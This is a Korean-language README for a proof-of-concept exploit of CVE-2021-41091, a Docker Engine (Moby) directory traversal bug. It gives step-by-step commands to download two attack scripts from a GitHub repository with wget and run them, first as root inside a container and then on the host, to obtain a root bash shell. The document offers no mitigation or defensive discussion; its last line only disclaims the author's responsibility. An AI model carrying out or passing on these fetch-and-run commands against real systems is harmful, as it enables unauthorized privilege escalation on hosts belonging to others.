
# CVE-2021-41091 개념 증명 익스플로잇: Moby(Docker Engine) 디렉터리 트래버설로 비특권 사용자가 컨테이너의 SUID 바이너리를 호스트에서 실행할 수 있게 함. Ubuntu 20.04용 PoC 스크립트 포함.
Moby(Docker Engine)의 버그로 인해 권한이 없는 사용자가 디렉토리를 탐색하고 Docker 내부의 프로그램을 호스트 머신에서 직접 실행할 수 있습니다. Docker 내부에 suid 프로그램이 있으면 사용자는 호스트 머신에서 이를 suid로 실행할 수 있습니다.
컨테이너 터미널에서 docker.sh 파일을 다운로드한 후 root 사용자로 실행합니다:
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/docker.sh
chmod +x docker.sh
./docker.sh
이제 호스트 머신에서 principal.sh 파일을 다운로드하고 실행합니다:
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/principal.sh
chmod +x principal.sh
./principal.sh
파일이 제공하는 명령을 실행하면 /bin/bash를 root로 실행할 수 있게 됩니다.
이 스크립트는 Moby 20.10.5+dfsg1 버전의 Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64)에서 테스트되었습니다.
이 저장소의 사용은 사용자 본인의 책임이며 작성자의 책임이 아닙니다.